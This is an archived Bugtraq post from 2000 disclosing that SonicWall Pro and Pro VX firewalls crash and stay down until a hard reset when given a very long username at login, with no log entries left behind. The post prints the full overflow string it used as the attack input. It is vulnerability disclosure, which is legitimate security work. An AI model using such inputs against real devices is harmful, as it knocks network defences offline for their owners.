Bugtraq mailing list archives

[no subject]


From: arieleis () COOLMAIL NET
Date: Fri, 1 Dec 2000 10:36:34 -0500

All,    
        After reading a report on security focus that deals with the sonicwall soho versions 4.0 and 5.0 being 
vulnerable to a buffer overflow by using a lot of characters in the username...I started testing against our Sonicwall 
Pro and Pro VX in the lab.

Entering this for the username   -


092843lb4b2j34lh324jklh321j4h23jh4h32lh4kh23jh4k32l4h1;32uo439028470923874823709479283740872319874872314-072319748-73214y321h4jh32;j4y;239847802134u32h4p923u432ij4iop832u4i32j4kj234jk32j4j2o3ij4;123o4juio23j4io2j314ioj231oij4i23h4ih32;i4hji;o234;io2j34;oijio;23j4;32i4h;i23h4;io3h2i;o4h;o234;io23j4i;o23j4;j32;4j;32j4;j3124;j23;i4j;2o3i4j;231h54;ioh213;o5i23;ioh54;o2i1hi2o345;oij145;oij23;o54;2o31jh45io;2j315;io243j;1i5o32;oh54;io23h145;i2154i1o2j435hi2143h5;h432;5ih143;5jh;4135hj;143j5;i15ji4o;jh1;ih54o;i5jh3o;i5jhio15jhi431h5i;o34h5;ioh4i;o5hi;4oh3;io54h;i4o1h5i;o143h5;io13;o5hj1io;4h5io;14hj5i;o1h;io4h5;oi1h5i;oh1345io;h43;oi5h4i;o1;5iohi;o435h;io134h5;1oj4;io13h;1h4;oi54;io231;io52;oi345;oi234;o51;ioj5r;j134i;o51;iohio4i;o;3o21oi5;io145hi43;oi5;43o5;4o35;34o5;o435;43hj5;o43h5;o435;ioh43oh5;43oi5j;oi4jh5;oij45;oj435;oj435;ioj435;oij435;oij345;oij34;o5ij43;oi5j4;3o5;345jio345oiuj43j5;43oj5;io435oij43oj54;3oj5;oij435;oi435;oi43o;5;io435;io3j45;oj34;5ioj;34oj5;o345j;o34o5j432o5i!
o234;oi5;oi435;o32uj4;5oiu4;oi;uj543u25u4;3o5;i345io;o435io34;5u;54;o2i3u45;i53;3i5u;i4325u2;3u534;25u32;o4iu5;324u5;i32ou5;io245u;342u5;23iou5;43o5iu345;234ou5234;o5iu2;34oi5u23;io5u23;ou45;34oui523;iou34;iou45;23iou4;2oi5u43;5iou243;o5iu32;4oui5;32ou45oi2u435;oi23u4j5;o243j5;o2ju435j345;j43;5;43j53;4jr;ifg;fjkfjklgfjkgfjk;lkj;lgfljklfkjgjkl;gjkl;gjkl;gjklgjklgjksfdjkgfjkl;g;jlgjklgfjkl;gj;lgfj;klgjkl;gjklfjklggklsjk;sk;jlsjkl;gjklfjkl;sl;jkjk;lgjkl;sgjgldljkgdjlk;fjl;gjkl;ldjsjlk;gsjl;kgjlksgjlkgsjlk;d;jlkdjkl;sflsgfjklgskjsgjkl;gslkjgsl;jklsgfdl;gjlfdlgk;jd;slfj;lkgsl;dfg;kjlsdfgkjsfjd;lgjsdjfgjsd';jgkjs;kfdgkjsd;fgj;sdf;jd;sjg;jdfgkjsd;fjgk;sj;sdljfjgk;sfjd;jgsd;fjgjsdgj;sldfj;gj;sdfjgj;sjfdjg;sdfjgjs;dfjg;ksdfjkgjsj;ksl;klj;lfdjgk;jfd;lgdfg

and using this for the password-

blah

The sonicwalls pro and pro vx not only stopped allowing communication....but lost everything altogether....they did 
not automatically reset....they did not automatically stop the log in......they were down until we physically reset 
them. This is a different issue than the prior reported because it actually stops communication for good until a hard 
reset.

Upon a reset I logged back into the box and guess what......NO LOGS AT ALL PERTAINING TO THE ATTACK!  This is no 
good...we need a firmware fix immediately.


mod7

digital llamas



